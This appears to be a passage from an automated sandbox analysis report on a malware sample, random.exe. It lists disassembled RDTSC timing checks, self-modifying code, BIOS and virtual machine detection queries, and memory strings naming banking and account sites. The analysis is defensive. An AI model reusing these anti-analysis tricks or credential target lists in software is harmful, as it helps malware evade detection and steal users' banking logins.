      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A008B second address: 55A0107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA8D8E164AFh 0x0000000a sub eax, 637A845Eh 0x00000010 jmp 00007FA8D8E164B9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 sub esp, 2Ch 0x0000001c jmp 00007FA8D8E164AEh 0x00000021 xchg eax, ebx 0x00000022 pushad 0x00000023 push ecx 0x00000024 mov eax, edx 0x00000026 pop edx 0x00000027 mov cl, 33h 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007FA8D8E164B0h 0x00000030 xchg eax, ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FA8D8E164B7h 0x00000038 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0107 second address: 55A017D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FA8D8E1DCFEh 0x0000000f push eax 0x00000010 pushad 0x00000011 call 00007FA8D8E1DD01h 0x00000016 mov edx, ecx 0x00000018 pop esi 0x00000019 push edx 0x0000001a pushfd 0x0000001b jmp 00007FA8D8E1DD08h 0x00000020 add ecx, 373D8108h 0x00000026 jmp 00007FA8D8E1DCFBh 0x0000002b popfd 0x0000002c pop ecx 0x0000002d popad 0x0000002e xchg eax, edi 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A017D second address: 55A0190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E164AEh 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0190 second address: 55A0195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A01B3 second address: 55A01B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A01B7 second address: 55A01BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A01BD second address: 55A0272 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FA8D8E164B7h 0x00000012 add cx, 74BEh 0x00000017 jmp 00007FA8D8E164B9h 0x0000001c popfd 0x0000001d mov si, 1A07h 0x00000021 popad 0x00000022 sub edi, edi 0x00000024 pushad 0x00000025 call 00007FA8D8E164B9h 0x0000002a pushfd 0x0000002b jmp 00007FA8D8E164B0h 0x00000030 or esi, 768C0018h 0x00000036 jmp 00007FA8D8E164ABh 0x0000003b popfd 0x0000003c pop ecx 0x0000003d movsx edx, si 0x00000040 popad 0x00000041 inc ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FA8D8E164B7h 0x00000049 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0272 second address: 55A02B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 pushfd 0x00000007 jmp 00007FA8D8E1DD00h 0x0000000c sub si, 84D8h 0x00000011 jmp 00007FA8D8E1DCFBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test al, al 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FA8D8E1DD05h 0x00000023 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A035A second address: 55A035E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A035E second address: 55A0362 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0362 second address: 55A0368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A03C4 second address: 55A045B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FA9497CBDA1h 0x0000000f pushad 0x00000010 movzx ecx, di 0x00000013 pushfd 0x00000014 jmp 00007FA8D8E1DD09h 0x00000019 sub cx, 4226h 0x0000001e jmp 00007FA8D8E1DD01h 0x00000023 popfd 0x00000024 popad 0x00000025 js 00007FA8D8E1DD80h 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007FA8D8E1DD03h 0x00000034 or esi, 48DEC55Eh 0x0000003a jmp 00007FA8D8E1DD09h 0x0000003f popfd 0x00000040 popad 0x00000041 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A045B second address: 55A0472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E164B3h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0472 second address: 55A0476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0476 second address: 55A04C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-14h], edi 0x0000000b pushad 0x0000000c movsx ebx, si 0x0000000f jmp 00007FA8D8E164ACh 0x00000014 popad 0x00000015 jne 00007FA9497C44AFh 0x0000001b pushad 0x0000001c push ecx 0x0000001d jmp 00007FA8D8E164ADh 0x00000022 pop eax 0x00000023 mov dx, 9594h 0x00000027 popad 0x00000028 mov ebx, dword ptr [ebp+08h] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FA8D8E164B6h 0x00000032 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A04C8 second address: 55A0523 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DCFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c pushad 0x0000000d mov al, CDh 0x0000000f jmp 00007FA8D8E1DD01h 0x00000014 popad 0x00000015 xchg eax, esi 0x00000016 jmp 00007FA8D8E1DCFEh 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FA8D8E1DCFCh 0x00000025 xor cx, 7A08h 0x0000002a jmp 00007FA8D8E1DCFBh 0x0000002f popfd 0x00000030 mov edi, esi 0x00000032 popad 0x00000033 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0523 second address: 55A0537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E164B0h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0537 second address: 55A053B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A053B second address: 55A0550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA8D8E164AAh 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0550 second address: 55A0562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E1DCFEh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0562 second address: 55A059B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007FA8D8E164B6h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA8D8E164AEh 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A059B second address: 55A05DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA8D8E1DD01h 0x00000009 sub esi, 3E457946h 0x0000000f jmp 00007FA8D8E1DD01h 0x00000014 popfd 0x00000015 mov edx, esi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a nop 0x0000001b jmp 00007FA8D8E1DCFAh 0x00000020 xchg eax, ebx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov esi, edi 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A063E second address: 55A068C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov bx, A576h 0x00000012 pushfd 0x00000013 jmp 00007FA8D8E164B7h 0x00000018 or ch, FFFFFFFEh 0x0000001b jmp 00007FA8D8E164B9h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A068C second address: 55A06A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A06A9 second address: 55A06AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A06AD second address: 55A06B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A06B3 second address: 55A06C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E164B1h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A06C8 second address: 55A06CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A06CC second address: 5590C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FA9497C4427h 0x0000000e xor eax, eax 0x00000010 jmp 00007FA8D8DEFBDAh 0x00000015 pop esi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 leave 0x00000019 retn 0004h 0x0000001c nop 0x0000001d cmp eax, 00000000h 0x00000020 setne cl 0x00000023 xor ebx, ebx 0x00000025 test cl, 00000001h 0x00000028 jne 00007FA8D8E164A7h 0x0000002a jmp 00007FA8D8E16664h 0x0000002f call 00007FA8DD4E86E2h 0x00000034 mov edi, edi 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 jmp 00007FA8D8E164AEh 0x0000003e mov dx, cx 0x00000041 popad 0x00000042 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5590C19 second address: 5590C1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5590C1F second address: 5590C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5590C23 second address: 5590C48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FA8D8E1DD07h 0x00000011 pop eax 0x00000012 popad 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5590C48 second address: 5590C6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov ebx, esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA8D8E164B5h 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5590C6D second address: 5590C7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E1DCFCh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5590C7D second address: 5590C93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA8D8E164AAh 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5590C93 second address: 5590C99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5590C99 second address: 5590CB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA8D8E164B0h 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5590CB6 second address: 5590CBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5590CBA second address: 5590CC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5590CC0 second address: 5590CDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DCFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5590CDB second address: 5590CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5590CDF second address: 5590CE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0AE9 second address: 55A0B0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA8D8E164ACh 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0B0D second address: 55A0B28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DCFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edx, 0A390166h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0B28 second address: 55A0B81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA8D8E164B8h 0x00000008 push esi 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007FA8D8E164ACh 0x00000014 cmp dword ptr [75FA459Ch], 05h 0x0000001b jmp 00007FA8D8E164B0h 0x00000020 je 00007FA9497B4338h 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FA8D8E164AAh 0x0000002f rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0B81 second address: 55A0B90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DCFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0B90 second address: 55A0B96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0B96 second address: 55A0B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0BE9 second address: 55A0BF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0C7E second address: 55A0CAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esi, esi 0x0000000b pushad 0x0000000c mov ebx, 5BEF6550h 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop edi 0x00000014 pop esi 0x00000015 popad 0x00000016 mov dword ptr [ebp-1Ch], esi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FA8D8E1DCFAh 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0D1C second address: 55A0D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0D20 second address: 55A0D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0D26 second address: 55A0D34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E164AAh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55A0D34 second address: 55A0D38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55B0B52 second address: 55B0B6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 mov esi, edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA8D8E164AFh 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55B0B6F second address: 55B0B87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E1DD04h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55B0B87 second address: 55B0BB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FA8D8E164B6h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov bl, 7Eh 0x00000018 popad 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55B0BB7 second address: 55B0BBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55B0BBD second address: 55B0BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55B0BC1 second address: 55B0C8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DCFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FA8D8E1DD00h 0x00000011 push eax 0x00000012 pushad 0x00000013 mov dh, 2Eh 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 xchg eax, esi 0x00000019 pushad 0x0000001a mov di, 2034h 0x0000001e pushfd 0x0000001f jmp 00007FA8D8E1DCFDh 0x00000024 jmp 00007FA8D8E1DCFBh 0x00000029 popfd 0x0000002a popad 0x0000002b mov esi, dword ptr [ebp+0Ch] 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FA8D8E1DD04h 0x00000035 sbb al, 00000018h 0x00000038 jmp 00007FA8D8E1DCFBh 0x0000003d popfd 0x0000003e mov si, 68CFh 0x00000042 popad 0x00000043 test esi, esi 0x00000045 pushad 0x00000046 mov si, A2C7h 0x0000004a mov bx, ax 0x0000004d popad 0x0000004e je 00007FA9497AB469h 0x00000054 pushad 0x00000055 movzx ecx, bx 0x00000058 pushfd 0x00000059 jmp 00007FA8D8E1DD01h 0x0000005e sub ecx, 681F8566h 0x00000064 jmp 00007FA8D8E1DD01h 0x00000069 popfd 0x0000006a popad 0x0000006b cmp dword ptr [75FA459Ch], 05h 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007FA8D8E1DCFDh 0x00000079 rdtsc
      Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 55B0D78 second address: 55B0D7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe Special instruction interceptor: First address: EE586E instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\random.exe Special instruction interceptor: First address: EE5959 instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\random.exe Special instruction interceptor: First address: 1087103 instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\random.exe Special instruction interceptor: First address: EE365A instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\random.exe Special instruction interceptor: First address: 111054A instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\random.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
      Source: C:\Users\user\Desktop\random.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
      Source: C:\Users\user\Desktop\random.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
      Source: C:\Users\user\Desktop\random.exe TID: 6052 Thread sleep time: -180000s >= -30000s
      Source: C:\Users\user\Desktop\random.exe TID: 520 Thread sleep time: -30000s >= -30000s
      Source: C:\Users\user\Desktop\random.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696501413o
      Source: random.exe, 00000000.00000002.1151080655.0000000001064000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696501413j
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
      Source: random.exe, random.exe, 00000000.00000003.1143968813.0000000001769000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1150605286.0000000001769000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1151708836.0000000001769000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1061905252.0000000001769000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1112946478.0000000001769000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1124260706.0000000001769000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696501413x
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696501413t
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - HKVMware20,11696501413]
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696501413s
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
      Source: random.exe, 00000000.00000003.1079865848.000000000600C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696501413p
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
      Source: random.exe, 00000000.00000002.1151591333.0000000001728000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1150430246.0000000001728000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
